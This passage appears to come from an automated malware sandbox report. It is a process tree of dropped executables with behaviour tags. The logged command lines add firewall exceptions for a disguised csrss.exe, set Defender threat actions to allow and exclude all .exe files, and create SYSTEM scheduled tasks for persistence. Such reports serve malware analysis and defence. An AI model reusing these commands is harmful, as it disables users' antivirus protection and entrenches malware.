- Suspicious use of AdjustPrivilegeToken
PID:3184
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -nologo -noprofile11⤵
- Command and Scripting Interpreter: PowerShell
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
PID:5536
-
-
-
-
C:\Users\Admin\Pictures\sxH8wPyOdz7RaPkmDFy3Ezsl.exe"C:\Users\Admin\Pictures\sxH8wPyOdz7RaPkmDFy3Ezsl.exe"9⤵
- Modifies firewall policy service
- Executes dropped EXE
- Drops file in System32 directory
PID:5060
-
-
C:\Users\Admin\Pictures\QB6YJisOeMAwgSEX9tGB7uFD.exe"C:\Users\Admin\Pictures\QB6YJisOeMAwgSEX9tGB7uFD.exe"9⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:940 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -nologo -noprofile10⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3800
-
-
C:\Users\Admin\Pictures\QB6YJisOeMAwgSEX9tGB7uFD.exe"C:\Users\Admin\Pictures\QB6YJisOeMAwgSEX9tGB7uFD.exe"10⤵
- Executes dropped EXE
- Checks for VirtualBox DLLs, possible anti-VM trick
PID:5516 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -nologo -noprofile11⤵
- Command and Scripting Interpreter: PowerShell
- Drops file in System32 directory
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
PID:6120
-
-
C:\Windows\system32\cmd.exeC:\Windows\Sysnative\cmd.exe /C "netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes"11⤵PID:5348
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes12⤵
- Modifies Windows Firewall
PID:5740
-
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -nologo -noprofile11⤵
- Command and Scripting Interpreter: PowerShell
- Drops file in System32 directory
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
PID:5812
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -nologo -noprofile11⤵
- Command and Scripting Interpreter: PowerShell
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
PID:1248
-
-
-
-
C:\Users\Admin\Pictures\9jNfLlKCEF3ERyMnjj34oq77.exe"C:\Users\Admin\Pictures\9jNfLlKCEF3ERyMnjj34oq77.exe"9⤵
- Executes dropped EXE
PID:5948 -
C:\Users\Admin\AppData\Local\Temp\7zS8901.tmp\Install.exe.\Install.exe /tEdidDDf "385118" /S10⤵
- Checks BIOS information in registry
- Executes dropped EXE
- Enumerates system info in registry
PID:812 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /C forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m help.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"11⤵PID:1108
-
C:\Windows\SysWOW64\forfiles.exeforfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6"12⤵PID:5984
-
C:\Windows\SysWOW64\cmd.exe/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 613⤵PID:5972
-
\??\c:\windows\SysWOW64\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 614⤵PID:1500
-
-
-
-
C:\Windows\SysWOW64\forfiles.exeforfiles /p c:\windows\system32 /m calc.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6"12⤵PID:5332
-
C:\Windows\SysWOW64\cmd.exe/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 613⤵PID:4844
-
\??\c:\windows\SysWOW64\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 614⤵PID:3800
-
-
-
-
C:\Windows\SysWOW64\forfiles.exeforfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6"12⤵PID:5428
-
C:\Windows\SysWOW64\cmd.exe/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 613⤵PID:5524
-
\??\c:\windows\SysWOW64\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 614⤵PID:3164
-
-
-
-
C:\Windows\SysWOW64\forfiles.exeforfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6"12⤵PID:5228
-
C:\Windows\SysWOW64\cmd.exe/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 613⤵PID:1992
-
\??\c:\windows\SysWOW64\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 614⤵PID:4684
-
-
-
-
C:\Windows\SysWOW64\forfiles.exeforfiles /p c:\windows\system32 /m help.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"12⤵PID:5864
-
C:\Windows\SysWOW64\cmd.exe/C powershell start-process -WindowStyle Hidden gpupdate.exe /force13⤵PID:5932
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell start-process -WindowStyle Hidden gpupdate.exe /force14⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious use of AdjustPrivilegeToken
PID:4632 -
C:\Windows\SysWOW64\gpupdate.exe"C:\Windows\system32\gpupdate.exe" /force15⤵PID:3100
-
-
-
-
-
-
C:\Windows\SysWOW64\forfiles.exe"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m where.exe /c "cmd /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True"11⤵PID:5436
-
C:\Windows\SysWOW64\cmd.exe/C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True12⤵PID:4760
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True13⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious use of AdjustPrivilegeToken
PID:5088 -
C:\Windows\SysWOW64\Wbem\WMIC.exe"C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True14⤵
- Suspicious use of AdjustPrivilegeToken
PID:5208
-
-
-
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "bbmnnUCIPYyTQrzMQJ" /SC once /ST 04:43:00 /RU "SYSTEM" /TR "\"C:\Users\Admin\AppData\Local\Temp\7zS8901.tmp\Install.exe\" it /WbvdidcnYg 385118 /S" /V1 /F11⤵
- Drops file in Windows directory
- Creates scheduled task(s)
PID:2548
-
-
C:\Windows\SysWOW64\forfiles.exe"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m waitfor.exe /c "cmd /C schtasks /run /I /tn bbmnnUCIPYyTQrzMQJ"11⤵PID:944
-
C:\Windows\SysWOW64\cmd.exe/C schtasks /run /I /tn bbmnnUCIPYyTQrzMQJ12⤵PID:1708
-
\??\c:\windows\SysWOW64\schtasks.exeschtasks /run /I /tn bbmnnUCIPYyTQrzMQJ13⤵PID:424
-
-
-
-
-
-
C:\Users\Admin\Pictures\OiMQrdAwVVHWkDVgxlIifdu6.exe"C:\Users\Admin\Pictures\OiMQrdAwVVHWkDVgxlIifdu6.exe"9⤵
- Executes dropped EXE
PID:1532 -
C:\Users\Admin\AppData\Local\Temp\7zS9824.tmp\Install.exe.\Install.exe /tEdidDDf "385118" /S10⤵
- Checks BIOS information in registry
- Executes dropped EXE
- Enumerates system info in registry
PID:2884 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /C forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m help.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"11⤵PID:464
-
C:\Windows\SysWOW64\forfiles.exeforfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6"12⤵PID:5756
-
C:\Windows\SysWOW64\cmd.exe/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 613⤵PID:5612
-
\??\c:\windows\SysWOW64\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 614⤵PID:1888
-
-
-
-
C:\Windows\SysWOW64\forfiles.exeforfiles /p c:\windows\system32 /m calc.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6"12⤵PID:2532
-
C:\Windows\SysWOW64\cmd.exe/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 613⤵PID:5996
-
\??\c:\windows\SysWOW64\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 614⤵PID:5532
-
-
-
-
C:\Windows\SysWOW64\forfiles.exeforfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6"12⤵PID:5744
-
C:\Windows\SysWOW64\cmd.exe/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 613⤵PID:5276
-
\??\c:\windows\SysWOW64\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 614⤵PID:5684
-
-
-
-
C:\Windows\SysWOW64\forfiles.exeforfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6"12⤵PID:5264
-
C:\Windows\SysWOW64\cmd.exe/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 613⤵PID:4648
-
\??\c:\windows\SysWOW64\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 614⤵PID:5168
-
-
-
-
C:\Windows\SysWOW64\forfiles.exeforfiles /p c:\windows\system32 /m help.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"12⤵PID:3372
-
C:\Windows\SysWOW64\cmd.exe/C powershell start-process -WindowStyle Hidden gpupdate.exe /force13⤵PID:5368
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell start-process -WindowStyle Hidden gpupdate.exe /force14⤵
- Command and Scripting Interpreter: PowerShell
PID:4536 -
C:\Windows\SysWOW64\gpupdate.exe"C:\Windows\system32\gpupdate.exe" /force15⤵PID:5828
-
-
-
-
-
-
C:\Windows\SysWOW64\forfiles.exe"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m where.exe /c "cmd /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True"11⤵PID:5632
-
C:\Windows\SysWOW64\cmd.exe/C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True12⤵PID:4844
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True13⤵
- Command and Scripting Interpreter: PowerShell
PID:1480 -
C:\Windows\SysWOW64\Wbem\WMIC.exe"C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True14⤵PID:2456
-
-
-
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "bbmnnUCIPYyTQrzMQJ" /SC once /ST 04:43:00 /RU "SYSTEM" /TR "\"C:\Users\Admin\AppData\Local\Temp\7zS9824.tmp\Install.exe\" it /gzCdidTIuK 385118 /S" /V1 /F11⤵
- Creates scheduled task(s)
PID:5876
-
-
C:\Windows\SysWOW64\forfiles.exe"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m waitfor.exe /c "cmd /C schtasks /run /I /tn bbmnnUCIPYyTQrzMQJ"11⤵PID:1344
-
C:\Windows\SysWOW64\cmd.exe/C schtasks /run /I /tn bbmnnUCIPYyTQrzMQJ12⤵PID:3344
-
\??\c:\windows\SysWOW64\schtasks.exeschtasks /run /I /tn bbmnnUCIPYyTQrzMQJ13⤵PID:6036
-
-
-
-
-
-
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\installutil.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\installutil.exe"8⤵PID:2816
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\1000015001\NewB.exe"C:\Users\Admin\AppData\Local\Temp\1000015001\NewB.exe"5⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:1336 -
C:\Windows\SysWOW64\schtasks.exe"C:\Windows\System32\schtasks.exe" /Create /SC MINUTE /MO 1 /TN NewB.exe /TR "C:\Users\Admin\AppData\Local\Temp\1000015001\NewB.exe" /F6⤵
- Creates scheduled task(s)
PID:1792
-
-
C:\Users\Admin\AppData\Local\Temp\1000251001\ISetup8.exe"C:\Users\Admin\AppData\Local\Temp\1000251001\ISetup8.exe"6⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:3180 -
C:\Users\Admin\AppData\Local\Temp\u2gc.0.exe"C:\Users\Admin\AppData\Local\Temp\u2gc.0.exe"7⤵
- Executes dropped EXE
- Loads dropped DLL
- Checks processor information in registry
- Suspicious behavior: EnumeratesProcesses
PID:2808
-
-
C:\Users\Admin\AppData\Local\Temp\u2gc.1.exe"C:\Users\Admin\AppData\Local\Temp\u2gc.1.exe"7⤵
- Executes dropped EXE
- Checks SCSI registry key(s)
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
PID:4600 -
C:\Users\Admin\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe"C:\Users\Admin\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe" /eieci=11A12794-499E-4FA0-A281-A9A9AA8B2685 /eipi=5488CB36-BE62-4606-B07B-2EE938868BD18⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:5416
-
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 3180 -s 11647⤵
- Program crash
PID:5060
-
-
-
-
-
-
C:\Users\Admin\1000006002\ab3480ef7f.exe"C:\Users\Admin\1000006002\ab3480ef7f.exe"3⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Checks whether UAC is enabled
PID:3668
-
-
-
C:\Users\Admin\AppData\Local\Temp\7af68cdb52\axplons.exeC:\Users\Admin\AppData\Local\Temp\7af68cdb52\axplons.exe1⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious behavior: EnumeratesProcesses
PID:4692
-
C:\Users\Admin\AppData\Local\Temp\908f070dff\explorku.exeC:\Users\Admin\AppData\Local\Temp\908f070dff\explorku.exe1⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious behavior: EnumeratesProcesses
PID:1028
-
C:\Users\Admin\AppData\Local\Temp\1000015001\NewB.exeC:\Users\Admin\AppData\Local\Temp\1000015001\NewB.exe1⤵
- Executes dropped EXE
PID:3864
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 436 -p 3180 -ip 31801⤵PID:1476
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s fhsvc1⤵PID:3720
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -s WPDBusEnum1⤵PID:3036
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 360 -p 2472 -ip 24721⤵PID:5688
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s fhsvc1⤵PID:3944
-
C:\Users\Admin\AppData\Local\Temp\7zS8901.tmp\Install.exeC:\Users\Admin\AppData\Local\Temp\7zS8901.tmp\Install.exe it /WbvdidcnYg 385118 /S1⤵PID:2304
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /C forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m help.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"2⤵PID:3912
-
C:\Windows\SysWOW64\forfiles.exeforfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6"3⤵PID:5504
-
C:\Windows\SysWOW64\cmd.exe/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 64⤵PID:5436
-
\??\c:\windows\SysWOW64\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 65⤵PID:2292
-
-
-
-
C:\Windows\SysWOW64\forfiles.exeforfiles /p c:\windows\system32 /m calc.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6"3⤵PID:2532
-
C:\Windows\SysWOW64\cmd.exe/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 64⤵PID:2396
-
\??\c:\windows\SysWOW64\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 65⤵PID:2028
-
-
-
-
C:\Windows\SysWOW64\forfiles.exeforfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6"3⤵PID:2312
-
C:\Windows\SysWOW64\cmd.exe/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 64⤵PID:5244
-
\??\c:\windows\SysWOW64\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 65⤵PID:4120
-
-
-
-
C:\Windows\SysWOW64\forfiles.exeforfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6"3⤵PID:5764
-
C:\Windows\SysWOW64\cmd.exe/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 64⤵PID:1960
-
\??\c:\windows\SysWOW64\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 65⤵PID:3752
-
-
-
-
C:\Windows\SysWOW64\forfiles.exeforfiles /p c:\windows\system32 /m help.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"3⤵PID:5552
-
C:\Windows\SysWOW64\cmd.exe/C powershell start-process -WindowStyle Hidden gpupdate.exe /force4⤵PID:5568
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell start-process -WindowStyle Hidden gpupdate.exe /force5⤵
- Command and Scripting Interpreter: PowerShell
PID:3628 -
C:\Windows\SysWOW64\gpupdate.exe"C:\Windows\system32\gpupdate.exe" /force6⤵PID:3864
-
-
-
-
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"225451\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"225451\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"256596\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"256596\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"242872\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"242872\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749373\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749373\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147807942\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147807942\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735735\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735735\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737010\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737010\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737007\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737007\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737503\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737503\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735503\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735503\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749376\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749376\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737394\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737394\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147841147\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147841147\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"359386\" /t REG_SZ /d 6 /reg:32;REG ADD 